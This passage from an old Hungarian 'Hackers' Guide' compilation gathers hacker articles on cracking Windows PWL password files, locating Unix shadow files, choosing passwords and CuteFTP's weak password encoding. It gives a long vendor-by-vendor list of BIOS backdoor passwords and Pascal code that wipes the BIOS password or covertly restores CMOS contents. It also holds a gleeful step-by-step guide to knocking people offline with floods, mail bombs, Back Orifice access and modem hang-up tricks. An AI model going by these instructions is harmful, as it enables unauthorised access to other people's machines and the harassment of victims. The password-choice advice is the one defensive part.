nyilván adott, és így tud hozzáférni a program ezekhez. Tehát ha egy hazahozott<br />
PWL-lel van dolgod, akkor ez a módszer nem jöhet számításba. Ha viszont nem<br />
figyel oda az ismerosöd, vagy internetes kávéház, vagy ilyen helyre tévedsz, akkor<br />
valóban sok hasznát lehet venni. Természetesen, azt mondanom sem kell, hogy NE<br />
lemezen vidd magaddal, (engem is kitiltottak a könyvtárból miatta... :( ), hanem küldd<br />
el egy ingyenes mail címre, amihez ott is hozzáférhetsz. Oszintén szólva viszont,<br />
amelyik ingyenes hely ilyen lazán veszi a dolgot, hogy a saját felhasználó felületen<br />
hozzáférést enged a jelszavakhoz, az magára vessen... :) Viszont láttam olyan<br />
megoldást, hogy az internetes jelszóhoz csak a rendszergazda fért hozzá, és a többi<br />
felhasználó a szerveren keresztül csatlakozott az internetre. Ebben az esetben sem<br />
ér semmit ez a pwlcrack. (Ja, a DialPwd egyes vírusírtók szerint trójaival fertozött!<br />
Semmiképpen sem javaslom.) Mi volt a megoldás? Haza kellett vinni az összes<br />
PWL-t, és nekiállni a feltörésnek.<br />
Hogyan törjük?<br />
A PWL fájloknál egy alapvetoinformációra van szükség a töréshez, különben<br />
fölösleges vele szenvedni. Az egyik a felhasználónév. Ezt a Windows is kiírja a<br />
vezérlopult/felhasználók menüben, illetve a fájl nevébol is lehet rá következtetni.<br />
(Vagy pwlhack-kel a /grab opció) A Windows a system.ini-ben tartja, hogy melyik<br />
pwl-hez milyen felhasználónév tartozik. Ha van egy petra.pwl nevu fájlod, akkor a<br />
felhasználónév tuti hogy Petra. Kis nagy betu nem számít. (Ékezetben viszont lehet,<br />
ezt nem tudom.) A Windows az alapján adja a fájlnevet, hogy mi a felhasználónév.<br />
Csak 8 karaktert használ, tehát a rendszer.pwl felhasználóneve lehet rendszer, de<br />
lehet akár rendszergazda is. Az ékezeteket nem haszál a Windows. Ha két<br />
ugyanolyan fájl keletkezne, akkor az újabbnak egy számot rak a végére. Ezért<br />
szerencsés inkább a megnézni a system.ini-ben...<br />
Megvan a felhasználónév, most már csak a jelszóra van szükség. Két módszert<br />
szeretnék bemutatni, alapveto törési eljárások :)<br />
Dictionary Attack:<br />
Ez azt jelenti, hogy egy szótárállományból a töro program végigpróbálja az összes<br />
szereplo szót. Ez akkor hasznos, ha a hülye felhasználó valami gyakori kódot adott<br />
meg. (pl: titanic) Elonye a módszernek hogy gyors, és (tapasztalat) gyakran sikeres.<br />
:) Szükség van a szótárállományra, jobb programok mellé adják, és természetesen<br />
sajátot is lehet használni. Az külön extrának számít, ha néhány variációt is kipróbál a<br />
program soronként, például mellérak egy számot (kutyus01, kutyus02, stb.) vagy<br />
megpróbálja a fordítottját. (dog->god)<br />
Brute Force:<br />
Nyers ero. Hogy miért ilyen hülye nevet adtak neki, az szerintem örökké rejtély<br />
190
Hackers’ Guide<br />
marad. Talán azért, mert az ilyen módszerhez elég eros processzorú gépre van<br />
szükség, hogy elviselheto legyen a sebesség. Még mindig nem mondtam hogy mi<br />
ez... tehát ezzel a módszerrel a kódtöro az összes létezo variációt próbálja végig. Ez<br />
természetesen a jelszó hosszúságával arányosan no (hatványosan...). A választható<br />
karakterek száma határozza meg a lehetoségek számát (kombinatorika). Pl. egy<br />
angol szó a jelszó, nincs benne ékezet, nincs benne szám, nincs benne más<br />
karakter, akkor a használható angol ábécé 26 karaktere jöhet számításba, és így<br />
mondjuk egy öt karakteres jelszó esetén a lehetoségek száma 26*26*26*26*26, azaz<br />
26^5. Ez 11881376. Értheto így már, hogy miért tart ez hosszabb ideig? :) Elonye<br />
viszont kétségkívül az alaposság és hogy nem marad ki semmi, meg hogy tuti<br />
meglesz az amit keresel... :)<br />
A sebességrol nem szeretnék mondani, mert függ a processzortól, függ a karakterek<br />
számától...<br />
Most már csak egy dolgot nem mondtam el, hogy milyen szoftverekkel állhatunk neki<br />
dolgozni...<br />
GLIDE:<br />
Amit semmiképpen nem ajánlok, az a Glide. Egyszeruen sehogyan sem sikerült a<br />
programot muködésre bírni. Felhasználónevet alapértelmezésként a fájlnévnek<br />
tekinti, és folyton kérdez. Csak Brute Force-ot támogat. Cached Passwords-ot nem<br />
tudja, és úgy néz ki, hogy csak az alap W95 fájljaihoz jó. Egyetlen elonye talán az,<br />
hogy egy C++-ben írt forrást adnak mellé. Természetesen sz@rra nem lehet<br />
építkezni... :)<br />
PWLCRACK<br />
Egyes hackeroldalon hangoztatott állításokkal szemben a PWLCRACK egy Win32<br />
alkalmazás, nem indul el DOS alatt. Az más kérdés, hogy karakteres képernyot<br />
használ, nem ablakozik. De persze ennek köze sincs az OS-hez, de ezt hagyjuk.<br />
A program csak a cached password-öket írja ki. Szabvány API hívással muködik.<br />
DIAL-UP<br />
Az elozohöz hasonló program, szintén csak a cached passwordshöz jó. Külön<br />
elonye, hogy kiír a Windows registrybol is minden használható információt az<br />
internetes beállításokra vonatkozólag. Tehát DNS szerverek, IP cím, login script, stb.<br />
PWL HACK:<br />
Ez egy jó kicsi, orosz program. Elonye az elozovel szemben, hogy muködik. :)<br />
Támogatja a Brute Force, és a Dictionary módokat is, és a megszakított keresést is<br />
folytatni tudja. Van mellé egy kis forrás is C, természetesen. A megfejtett külso PWLbol<br />
is, sot az aktuális felhasználó cached passwords-ét is kijelzi, tehát a PWLCRACK<br />
progi lehetoségeit is magában foglalja.<br />
Van még neki az említett grab funkciója, ami kimenti a felhasználóneveket. A spy<br />
funkció látja el a PWLCRACk dolgát. Nagyon gyorsan dolgozik a BruteForce-szal,<br />
lényegesen gyorsabban mint a Wines társai.<br />
Az progi dpmi alkalmazás, fut DOS-ból és Winbol is. Nem grafikus a felülete,<br />
paraméterezgetni kell. Az elozo progik kicsik, ennek a mérete viszont 400k körül<br />
mozog. A SAC-on is megtalálható :)<br />
CAIN & ABEL:<br />
1. Képernyovédo jelszava, rögtön és kapásból.<br />
2. Külso regisztrybol ugyanez.<br />
191
Hackers’ Guide<br />
3. A számítógépen levo fájlmegosztást, nyomtatómegosztást stb. jelszavait is<br />
kapásból megmutatja.<br />
4. Pwlcrack is, tehát aktuális felhasználó cached passwordjei.<br />
5. Egy PWL töro, Dictionary, és Brute Force elven is, és egész jó WordListet adnak<br />
hozzá!!<br />
6. Helyi hálón levo shared jelszavak kijelzése (Sajnos csak egy gépem van, nem<br />
tudtam kipróbálni.)<br />
7. Abel client. Ez egy BO szeru administrator tool :) gyengébb képességekkel,<br />
elsosorban jelszóra kiélezve. Muködik LAN-on és Interneten is. Az Abel szerver<br />
benne van a Cain 1.51-ben, ami mellesleg FREE szoftver is, az 1.0 még fizetos volt.<br />
Természetesen crack létezett hozzá... :) Sajnos viszont a BreakDance rakott az Abel<br />
szerverbe egy figyelmezteto ablakot, hogy "You are under monitoring", szóval nem<br />
az igazi...<br />
Van neki egy toggle password caching funkciója, amivel ki lehet kapcsolni, hogy a<br />
Windows megjegyezze a jelszókat. Ekkor viszont minden alkalommal újra be kell írni<br />
oket. El tudja távolítani az aktuális felhasználó cached resources bejegyzéseit.<br />
Az egész program Win alapú, szép, könnyu kezelofelülettel. Egy hátránya, hogy az<br />
elozo 10k-s programok mellett ez 600k fölött van.<br />
PWLTOOL<br />
A Cainnak egy komoly vetélytársa. Mondhatjuk azt, hogy mindent tud, amit az<br />
elozorol elmondtam. Képernyovédo, shared passwords, cached passwords, stb.<br />
Brute Force, Dictionary, és még ketto törési mód van benne. A töréshez lehet a<br />
szabvány API hívás, és a program "módszere" között választani. Természetesen ez<br />
utóbbi lényegesen gyorsabb. Sokkal jobb sebességeredményt lehet így elérni.<br />
Ebben is megtalálható a password lopáshoz egy kis trójai program. Úgy elbújik, hogy<br />
még a trayben sincs, sot ctrl+alt+del-re sem jön elo.<br />
A programnak egy nagy hibája van. Nagyon pénzéhes, és regisztráltatni akarja<br />
magát. Hát ez felháborító! Nem gondoljátok? Nincs valakinek a hatos verzióhoz<br />
törése?<br />
A történet vége, ennyi és kész!<br />
RSC (TM)<br />
************************************************************************************************<br />
Password fileok keresése<br />
Ez a táblázat leírja hogy különbözõ operációs rendszerekben hol találod a passwd<br />
fajlt !<br />
192
Version Path Token<br />
-----------------------------------------------------------------<br />
AIX 3 /etc/security/passwd !<br />
vagy /tcb/auth/files//<br />
A/UX 3.0s /tcb/files/auth/?/*<br />
BSD4.3-Reno /etc/master.passwd *<br />
ConvexOS 10 /etc/shadpw *<br />
ConvexOS 11 /etc/shadow *<br />
DG/UX /etc/tcb/aa/user/ *<br />
EP/IX /etc/shadow x<br />
HP-UX /.secure/etc/passwd *<br />
IRIX 5 /etc/shadow x<br />
Linux 1.1 /etc/shadow *<br />
OSF/1 /etc/passwd[.dir|.pag] *<br />
SCO Unix #.2.x /tcb/auth/files//<br />
SunOS4.1+c2 /etc/security/passwd.adjunct ##username<br />
SunOS 5.0 /etc/shadow<br />
System V Release 4.0 /etc/shadow x<br />
System V Release 4.2 /etc/security/* database<br />
Ultrix 4 /etc/auth[.dir|.pag] *<br />
UNICOS /etc/udb *<br />
Hackers’ Guide<br />
D3viL^Woodoo<br />
************************************************************************************************<br />
Hogyan válasszunk rossz jelszót<br />
Ez a cikk fordítás, de sajnos nem tudom az eredeti szerzot, mert az angol cikkben<br />
nincs feltüntetve.<br />
Miután szereztél egy accountot egy számítógépre, meg kell választanod a jelszót<br />
hozzá. A jelszó megvédi a munkádat a számítógépen. Vannak jó jelszavak és rossz<br />
jelszavak. A rossz jelszó lehetové teszi másoknak, hogy használják az accountodat<br />
és elolvassák a fájlokat, vagy letöröljék a munkádat. Feltételezem, hogy nem akarod,<br />
hogy valaki más megtegye ezt, de ha mégis ezt akarod, akkor az alábbiak szerint kell<br />
eljárnod, hogy könnyebbé tedd a dolgát:<br />
1. Ha azt akarod, hogy nagyon könnyu dolga legyen, akkor a jelszó legyen a<br />
felhasználói azonosító, vagy a neved. Ez az, amit a jó feltöroprogramok eloször<br />
kipróbálnak.<br />
2. Ha ez nem tetszik, akkor a jelszó legyen a nickneved, a középso neved, vagy a<br />
születési éved, vagy egyéb információ, amihez bárki publikusan hozzájuthat egy<br />
nyilvántartásból vagy a finger paranccsal.<br />
3. Legyen a jelszó a barátnod/barátod/testvéred/háziállatod/gyereked neve. (Ha<br />
láttad a War Games címu filmet, akkor visszaemlékezhetsz, hogy a<br />
szuperszámítógép jelszava Falken professzor fiának a neve volt: Joshua.)<br />
4. Vagy válassz valami egyszeru, könnyen megszerezheto információt, pl. a<br />
telefonszámodat, az irányítószámodat, vagy a születésnapod dátumát, stb.<br />
193
Hackers’ Guide<br />
5. Használj szavakat vagy neveket Sci-fi vagy fantasy könyvekbol vagy filmekbol. A<br />
jelszófeltöro gyerekek imádják ezeket, szóval egyszeru lesz nekik kitalálni. Ha<br />
szépirodalomból vagy ókori mitológiából választasz egy nevet, akkor ezeket a<br />
gyerekeket kizárod, és csak a muvelt crackereknek marad esélyük.<br />
6. Ha egy kicsit nehezebbé akarod tenni a munkájukat, használj egy szót valamelyik<br />
szótáradból. Most, amikor már elérhetoek némely online szótárak, bárki írhat egy<br />
programot, amelyik végigpróbálja ezek adatbázisát, amíg meg nem találja a<br />
megfelelot. Lassú, de sokszor muködik.<br />
Namost, ha nem tetszik, hogy valaki más bejuthat az accountodra és elolvassa a<br />
leveleidet és letörölje a fájlokat, akkor itt van néhány tipp, hogy hogyan válassz *jó*<br />
jelszót magadnak:<br />
1. A legjobb jelszó betuk, számok és egyéb karakterek keveréke. Minél komplexebb<br />
és véletlenszerubb, annál nehezebb lesz feltörni. Természetesen nehéz lesz<br />
megjegyezni, tehát próbálj olyan bonyolult jelszót választani, amit azért könnyu<br />
megjegyezni, de másnak nehéz feltörni.<br />
2. Legalább 6 karakter hosszú legyen a jelszó. A rövidebb jelszavakat programokkal<br />
rövid ido alatt fel lehet törni. Az Unix újabb verziói csak minimum 6 karakter hosszú<br />
jelszavakat fogadnak el, és legalább egy karakternek kell benne lenni, ami nem betu.<br />
De ne feledd! Az Unix jelszavak csak 8 karakter hosszúak - a többit levágja a<br />
rendszer.<br />
3. Ha csak egy számot vagy szimbólumot adsz egy szóhoz, az kicsit<br />
biztonságosabbá teheti a jelszót, de ha a szó egy szótári szó, akkor ez nem elég.<br />
Egy ismert jelszófeltöro program könnyedén megfejtette ezt a jelszót: "offbeat1".<br />
Sokkal jobb kombináció az "off1beat".<br />
4. Használj szótöredékeket, szokatlan módon összekeverve, hogy ne forduljon elo<br />
egyetlen szótárban sem; vagy végy egy összetett szót és cseréld fel a darabokat<br />
szokatlan módon. A fenti jelszó még jobb, ha felcseréled az "off"-ot a "beat"-tel.<br />
5. Az obszcén szavak általában nem jó jelszónak, mert bár nem fordulnak elo<br />
szótárakban, de sok jelszótöro program éppen emiatt külön ellenorzi oket.<br />
6. Végy egy szót és helyettesítsd egyes betuit szimbólumokkal. De ne legyen túl<br />
egyszeru. Sok program elég okos ahhoz, hogy az "s" betu helyére "$" -t<br />
helyettesítsen, vagy "1"-et a "l" és az "I" helyére.<br />
7. Egy jó módja a jó jelszóválasztásnak, hogy egy kifejezés szavainak kezdobetuit<br />
veszed jelszónak. Pl. válassz egy versszakot egy versbol, és a szavak vagy sorok<br />
kezdobetuit vedd jelszónak. Ez eléggé véletlenszeru karaktersorozatot ad, amelyet te<br />
könnyen megjegyezhetsz, de nehéz feltörni, és ha valaki látja, nehezen tudja<br />
megjegyezni.<br />
8. Egyes betuket nagybeture változtatni, vagy fordítva (pl. PasSworD) nehezebbé<br />
teszik a feltörést, de nem lehetetlenné.<br />
9. Lejárt rendszámok, jogosítványszámok jók jelszónak, de a jelenlegi adataidat soha<br />
ne használd. Az NCC-1701 nem jó jelszó - túl sok cracker nézi a Star Treket.<br />
194
Hackers’ Guide<br />
10. Nem angol nyelvu kifejezések jobbak, mint az angol nyelvuek, de ha a cracker<br />
tudja, milyen nyelven van, megválaszthatja a megfelelo nyelvu szótárfájlt.<br />
Használj egy nem angol szót, és kombináld valamelyik fenti trükkel: ez eros jelszót<br />
ad, és könnyen megjegyezheted. Itt van még egy pár tipp:<br />
1. Gyakran változtasd meg a jelszavadat. Még ha valaki fel is töri a jelszavadat, nem<br />
sokáig tudja majd használni. Nehéz lehet ezt a szabályt betartani, kösd valami más<br />
eseményhez. Például ha minden hónapban megváltoztatod a jelszót, akkor pl. tedd<br />
akkor, amikor befizeted a számláidat, vagy változtasd meg mindig, amikor matekból<br />
dolgozatot írtál. Néhány számítógép "password aging" -et használ, ami arra<br />
kényszerít, hogy gyakran változtasd meg a jelszót. Ez hasznos dolog, ha nem túl<br />
gyakori ahhoz, hogy idegesíto legyen.<br />
2. Soha ne add oda a jelszavadat senkinek. A számítógép rendszergazdájának<br />
nincs rá szüksége, és amúgy is ki tudja találni (egy cracker programot futtatva a saját<br />
rendszerén). Ha valakitol olyan levelet kapsz, amelyben a jelszavadat kérik, az<br />
bizonyára egy cracker. Jelezd a rendszergazdának.<br />
3. Ha szerinted valaki látta, amikor beírtad a jelszót, minél hamarabb változtasd meg.<br />
Unix rendszereken ezt a "passwd" paranccsal teheted meg.<br />
4. Ha csak egy mód van rá, ne írd le a jelszót. Ha mégis le kell írnod, ne jelöld meg,<br />
hogy mihez van a jelszó. Ha valaki ilyet lát a számítógépeden, hogy "xyzzy", akkor<br />
még nem tudja, mi az, de ha ezt látja "a jelszavam xyzzy", akkor már igen.<br />
(Egyébként xyzzy egy kulcsszó egy számítógépes játékban, tehát amúgy sem jó<br />
jelszó :)<br />
5. Ha több számítógépen dolgozol, és nem ugyanazt a jelszófájlt használják, akkor<br />
mindegyik számítógépen használj más-más jelszót. Ha valaki feltöri az egyik<br />
jelszavadat, akkor attól még a másikba nem jut be.<br />
6. Ne küldj jelszót e-mailen keresztül. Az e-mail nem olyan biztonságos, mint<br />
gondolod.<br />
************************************************************************************************<br />
CuteFTP bizonytalan jelszótárolása<br />
Ez a cikk fordítás, az eredeti cikket írta: cube -cube@boxnetwork.net<br />
A CuteFTP egy fájlban tárolja a jelszavakat egyszeru karakter cserével, ezeket<br />
könnyen nyeri egy kódoló táblából. Ezzel lehetové teszi a távoli támadásoknak, hogy<br />
visszakódolják a jelszavakat, amik a SMDATA.DAT fájlban vannak tárolva. A<br />
rekordok egy speciális jelek alapján vannak elosztva, amit felváltanak a mezok<br />
195
Hackers’ Guide<br />
számai, amik néha különbözo ASCII karakterek alapján vannak behatárolva.<br />
A rekordok ilyen formában vannak tárolva: $? RECORD NAME ? IP ADDRESS ?<br />
USERNAME ? ENCRYPTED PASSWORD ? (a ? egy speciális karaktert jelent). A<br />
mezok részei vagy üresen vannak hagyva, vagy tartalmaznak egy kevés információt.<br />
A kódolás egy ismert egyszeru szöveg, a kódoló algoritmus könnyen levezetheto. A<br />
kódolás elvégzi a jelszó karakterek cseréjét més ASCII értékekre - a=? b=? stb. A<br />
CuteFTP a "session"-ok létrehozásakor ellátja jelszavakkal, mint abcABC stb.,<br />
könnyen megszerezheted az egyes karakterek pontos kódoló értékeit. Ha egy<br />
betolakodó halózati vagy fizikai hozzáférést szerez az SMDATA.<br />
DAT fájlhoz, akkor a jelszavaidnak lottek :). A betolakodó képes lesz kiszedni minden<br />
szükséges információt az SMDATA.DAT fájlból, hogy feltörje az eléréseidet.<br />
A szükséges program forráskóddal:cuteftp.zip<br />
Scalpal<br />
************************************************************************************************<br />
BIOS Hátsóajtók<br />
A legtöbb BIOS gyártó beépített bizonyos hátsóajtókat. Általában nem publikálják<br />
őket, mert kicsit "égő" dolog, hogy ezek után bármilyen BIOS jelszó megadása<br />
semmit sem ér... =)<br />
Például az AWARD BIOS simán "feltörhető" az AWARD_SW, AWARD_PW és j262<br />
(kis és nagybetű különbözik!) joker jelszavakkal. AMIBIOS-nak is van joker jelszava.<br />
Ez a BIOSTAR, vagy esetleg AMI.<br />
Az alábbi helyeken még találhatsz további infókat:<br />
http://www.hedgie.com/passwords/bios.html<br />
http://hem.passagen.se/unaxor/cracking.html<br />
http://www.voicenet.com/~raze/files/textfaq/pchack.txt<br />
http://www.geocities.com/Area51/Zone/6430/cracking.html<br />
- H3XR00T -<br />
http://hexnet.hpage.net/<br />
************************************************************************************************<br />
196
BIOS jelszavak feltörése<br />
Hackers’ Guide<br />
Ez foleg attól függ, hogy a gépben milyen BIOS van a gépben. A leggyakoribb BIOS<br />
fajták az Award, AMI, Phoenix. Biztos léteznek más BIOSok is, de én még más típust<br />
nem láttam.<br />
A legtöbb BIOS-ban be lehet állítani egy jelszót, amit szorgalmasan kér is, amikor<br />
hozzá akarsz férni a CMOS setuphoz, illetve bootolni akarsz. A gyártók szerintem<br />
minden BIOS-ba beépítettek gyári jelszavakat, amikkel be lehet lépni bármikor, de<br />
ezeket nem kötik az orrunkra :)<br />
Itt van egy lista, az általam ismert beépített jelszavakról, én nem tudtam mindet<br />
kipróbálni, nekem az AWARD_SW muködött, de azért érdemes próbálkozni ;)<br />
AWARD:<br />
01322222, 1EAAh, 256256, 589589, 589721, ?award, AWARD PW, AWARD SW,<br />
AWARD?SW, AWARD_PW, AWARD_SW, Award SW, CONCAT, CONDO, HELGA-<br />
S, HEWITT RAND, HLT, J64, KDD, PASSWORD, SER, SKY_FOX,<br />
SWITCHES_SW, SZYX, Sxyz, TTPTHA, TzqF, ZAAADA, ZBAAACA, ZJAAADC,<br />
_award, aLLy, aPAf, admin, alfarome, award, award.sw, award_?, award_ps,<br />
awkward, bios*, biosstar, biostar, condo, djonet, efmukl, g6PJ, h6BB, j09F, j256,<br />
j262, j322, j64, lkw peter, lkwpeter, setup, t0ch20x, t0ch88, ttptha, wodj, zbaaaca,<br />
zjaaadc<br />
AMI:<br />
589589, A.M.I., A.M.I., AMI, AMI SW, AMI!SW, AMI.KEY, AMI?SW, AMIPSWD,<br />
AMISETUP, AMI_SW, AMI~, BIOS, BIOSPASS, CMOSPWD, HEWITT RAND,<br />
KILLCMOS, Oder, PASSWORD, aammii, ami.kez, amiami, amidecod, amipswd,<br />
ami°, bios310, helgaßs<br />
Amptron<br />
Polrty<br />
AST:<br />
SnuFG5<br />
Biosstar:<br />
Biostar, Q54arwms<br />
Compaq:<br />
Compaq<br />
Concord:<br />
last<br />
CTX International:<br />
197
Hackers’ Guide<br />
CTX_123<br />
CyberMax:<br />
Congress<br />
Daewoo:<br />
Daewuu<br />
Daytek:<br />
Daytec<br />
Dell:<br />
Dell<br />
Digital Equipment:<br />
komprie<br />
Enox:<br />
xo11nE<br />
Epox:<br />
central<br />
Freetech:<br />
Posterie<br />
HP Vectra:<br />
hewlpack<br />
IBM:<br />
IBM, MBIUO, sertafu<br />
Iwill:<br />
iwill<br />
JetWay:<br />
spoom1<br />
Joss Technology:<br />
57gbz6, technolgi<br />
M Technology:<br />
mMmM<br />
198
MachSpeed:<br />
sp99dd<br />
Magic-Pro:<br />
prost<br />
Megastar:<br />
star<br />
Micron:<br />
sldkj754, xyzall<br />
Micronics:<br />
dn_04rjc<br />
Nimble:<br />
xdfk9874t3<br />
Packard Bell:<br />
bell9<br />
QDI:<br />
QDI<br />
Quantex:<br />
teX1, xljlbj<br />
Research:<br />
Col2ogro2<br />
Shuttle:<br />
Spacve<br />
Siemens Nixdorf:<br />
SKY_FOX<br />
SpeedEasy:<br />
lesarot1<br />
SuperMicro:<br />
ksdjfg934t<br />
Tinys:<br />
Hackers’ Guide<br />
199
Hackers’ Guide<br />
tiny<br />
TMC:<br />
BIGO<br />
Toshiba:<br />
24Banc81, Toshiba, toshy99<br />
Vextrex:<br />
Vextrex<br />
Vobis:<br />
merlin<br />
WIMBIOS v2.10:<br />
Compleri<br />
Zenith:<br />
3098z, Zenith<br />
ZEOS:<br />
zeosx<br />
Egyéb BIOSok, de próbálkozhatsz a AWARD-nál és AMI-nál is:<br />
ALFAROME, BIOSSTAR, biosstar, BIOSTAR, biostar, LKWPETER, lkwpeter, Syxz,<br />
Wodj<br />
Érdemes még próbálkozni a kis/nagy betuk cserélgetésével is...<br />
Ha nem tudsz bootolni a géprol - mert pl. rajta van egy System Commander - akkor<br />
ezek után már csak fizikai megoldás létezik. Két lehetoség van, az egyik az, hogy<br />
kiszedjük az alaplapról az elemet. Ekkor elvileg elveszti a CMOS memória a<br />
tartalmát, de általában szoktak beépíteni valami átmeneti tárolóáramkört, amivel még<br />
kibírja a memória az elemcserét. Ez az ido minden gyártónál más. (Ezt is ki lehet<br />
játszani egy ellenállás segítségével.)<br />
A másik módszer viszonylag egyszerubb, meg kell keresni az alaplapon a CMOS<br />
RAM Clear jumpert, majd rövidrezárni, és bekapcsolni a gépet. Ezután kikapcsoljuk a<br />
gépet és leszedjük a jumpert. Egy újabb bekapcsolás után üres, jelszómentes CMOS<br />
RAM-mal találjuk magunkat szembe :)<br />
Könnyebb a dolog, ha tudsz bootolni a géprol, mondjuk DOS/Win9x alá. Ilyenkor<br />
szoftveresen ki lehet loni a jelszót. Nem árt elotte elmenteni a CMOS tartalmát, hogy<br />
vész esetén vissza tudjuk tölteni. Itt van két sor Pascalban, ami kinyírja a jelszót:<br />
200<br />
port[ $70 ] := $2e;<br />
port[ $71 ]:=port[ $71 ] + 1;
Hackers’ Guide<br />
Az a lényege, hogy átír egy értéket a CMOS RAM-ban, de van egy ellenorzoösszeg<br />
a végén, és ez most hibás eredményt fog visszaadni. Ha ezt alkalmazod akkor<br />
elvesznek a winyók+floppyk beálltásai, meg az ido is.. Újraindítás után a BIOS vagy<br />
nem kér kódot, vagy felajánlja, hogy betölti az alap beállításokat, mintha<br />
bejumperelted volna a Clear CMOS RAM-ot :) Ez nem muködik NT alatt. Itt van egy<br />
másik programrészlet is, ami elmenti a CMOS tartalmát egy fájlba:<br />
var i, c : byte;<br />
cmosfile : file of byte;<br />
begin<br />
assign( cmosfile, 'cmos.ram' );<br />
rewrite( cmosfile );<br />
for i := 0 to 127 do begin<br />
port[ $70 ] := i;<br />
c := port[ $71 ];<br />
write( cmosfile , c );<br />
end;<br />
close( cmosfile);<br />
end.<br />
Mûködése egyértelmû, úgymint a következõ programrészletnek, ami a visszaírást<br />
végzi: (Talán annyit, hogy azért 10h címtõl kezdi, és nem 00h-tól, mert az elsõ Fh<br />
címü bájtokon állandóan változó információk találhatóak pl: óra, perc, évszám, leállás<br />
oka, stb.)<br />
var i, c : byte;<br />
cmosfile : file of byte;<br />
begin<br />
assign( cmosfile, 'cmos.ram' );<br />
reset( cmosfile );<br />
for i := $10 to 127 do begin<br />
port[ $70 ] := i;<br />
read( cmosfile , c );<br />
port[ $71 ] := c;<br />
end;<br />
close( cmosfile );<br />
end.<br />
Így észrevétlenül tudunk piszkálni a gépen, egyszerûen vissza lehet állítani az<br />
eredeti cmos tartalmát.<br />
Ezenkívül még ott van az a lehetõség is, hogy valami kis progival kiíratjuk a jelszót.<br />
Ilyen progit még csak egyet láttam, ami normálisan mûködött is (nálam), de sajna<br />
elveszett :(.<br />
Némely AMI biosokban van egy elég érdekes lehetõség is, ha nyomvatartod<br />
bootoláskor az End gombot, akkor törli a CMOS RAM tartalmát. Biztonság rulez!<br />
Sun-Zero<br />
sun-zero@freemail.hu<br />
201
Hackers’ Guide<br />
************************************************************************************************<br />
Hogyan "lőjjünk" ki másokat a netről?<br />
Denial of Service (DoS)<br />
Ebben az ismertetőben megpróbálom elmagyarázni a módszereket melyekkel<br />
kilőhetsz embereket a netről. Azt nem garantálom, hogy 100% működnek de azért 1<br />
próbát megér! =)<br />
1. Előszöris szerezz be egy jó és gyors! portscannert. Ez azonkívűl, hogy a Conseal<br />
felhasználókat meglepi vagy 10000 popup ablakkal =)) arra jó, hogy kiderítsd, hogy<br />
mégis milyen programok futnak a rendszeren, (mely portok vannak nyitva) vagyis,<br />
hogy hol vannak a leendő áldozatodnak a gyenge pontjai.<br />
2. Ezután meg kell szerezned az áldozat IP-címét, hogy tudd támadni, vagy<br />
szkennelni. Ilyen számot elég egyszerű szerezni. Ha IRC-n vagy akkor egyszerűen<br />
beírod, hogy /dns nick (Értelemszerűen a nick helyére a megtámadni kívánt személy<br />
irc-s beceneve kerül). ICQ alól, az ICQ programod megpatkolásával szerezheted<br />
meg az illető IP-jét. A harmadik módszer az, hogy megnézed a netstat paranccsal,<br />
hogy milyen IP-k csatlakoznak msot hozzád. Valószínű ott lesz az áldozat IP-je is.<br />
4. OK. Mostmár megvan az illető IP-je. Mostpedig vedd elő a gyors kis<br />
portscanneredet és futtasd végig az áldozat IP-jén, hogy megnézd mely portok<br />
vannak nyitva. Fontos, hogy tudd, hogy melyik portszámhoz mi tartozik! Bár a<br />
portscannerek kiírják a default ismertebb portokat www:80 / irc:6667 de ha mondjuk<br />
egy 31337 számú por van nyitva arra már nem bírsz lépni, hogy ez mégis mi a<br />
fenének a portja lehet. (Elárulom: BO default =)) Nos tegyük fel, hogy a portscanner<br />
talált egy nyitott portot pölö a 31337-est. No most ezt szépen megkeresed, hogy<br />
kinek a milye =). És lőn kiderúlt, hogy ez a Back Orifice portja. Ezekután már<br />
elfelejthetsz minden más módszert az illető buherálására, mert már a kezedben is<br />
tartod a rendszerét. Keresel egy BO klient, berod az IP-jét és csatlakozol. Ezek után<br />
bármit megcsínálhatsz vele amit ő megtud. (Mivel a BO erre lett kitalálva. =))<br />
Lehetőleg NE törölj le semmit, inkább nézz körül a gépén hátha találsz valami<br />
érdekeset. Soha sem tudhatod, hogy milyen fontos dokumentumokat törölsz le, amik<br />
lehet, hogy téged is érdekelnének! =)))<br />
5. Ha nem nyert a portscanner, akkor egyszerűen próbáld kilőni a 139-es porton<br />
keresztül. Ha nincs frissítve a rendszere (elég ritka manapság) akkor lekapcsolódik a<br />
netről, vagy csak kap egy "kékhalált" amin már csak a reset segít. =)<br />
6. Mégegy piszkálásnak jó az ICMP smurf nevű kis apróság, vagy egy egyszerű ping<br />
flood amitől leszakad a gépe a netről.<br />
202
Hackers’ Guide<br />
7. Ha tudod az áldozat e-mail címét küldj neki egy levélbombát, vagy írasd fel egy<br />
halom levelező listára.<br />
8. Ha fut az ICQ programja, akkor keress egy ICQ flooder-t és áraszd el üzenetekkel.<br />
Eredmény: meghal az ICQ-ja! =)<br />
9. Keress egy port bombázót, és támadd a nyitott portjait (flood). Ez érdekes<br />
kihatással lesz az IRC-s és ICQ beli teevékenységére... =)<br />
10. Ha csak egyszerűen meg akarod szakítani a net kapcsolatát akkor használd ki a<br />
modemblitz nevű progyt ami egy olyan spéci +++ath0 parancsot küldd amitől a<br />
modem bontja a kapcsolatot... =)<br />
11. Az a legjobb ha az itt lert támadási módszerket egyszerre csínálod. Valószínű<br />
kissé ideges lesz a delikvens... =) A neten rengeteg programot találhatsz a fent<br />
említett módszerek végrehajtására. Csak a képzelőtehettségedre van bízva, hogy a<br />
fent említett trükköket milyen kombinációban használod.<br />
Eredeti: tH3 m4n!4c dancho@mbox.digsys.bg<br />
- H3XR00T -<br />
http://hexnet.hpage.net/<br />
************************************************************************************************<br />
És lőn sötétség a click után...<br />
A BBS-es időkből néhányan emlékezhetnek még az ATDT, ATH0 és egyéb modem<br />
parancsokra [Ehhh... Régi szép idők... Nem tudom, vajon a sok milliomos csemete<br />
akiknek egyszer csak az ölébe szakadt egy PIII, Korlátlan net-előfizetéssel azok<br />
tudják-e még, hogy mi az, hogy BBS, vagy FIDO, vagy ATM0 (hogy ne verjük fel az<br />
egész házat ugye... =)) Szerintem RENGETEGET vesztett az aki ezekből a<br />
dolgokból kimaradt. Nem volt annál jobb mikor egy BBS-en órákat beszéltem a<br />
Sysoppal a világ dolgairól, közben meg jött le egy 20 megás warez 14440-el...=) -<br />
H3XR00T] - de ha mi emberek már elfeledkeztünk róluk, biztosan vannak még olyan<br />
lények, akik tudják mik ezek - s ezen lények nem mások mint a modemek. Ez a<br />
gondolat néhány hacker fejében is megfogant, s nemsokára megszületett a<br />
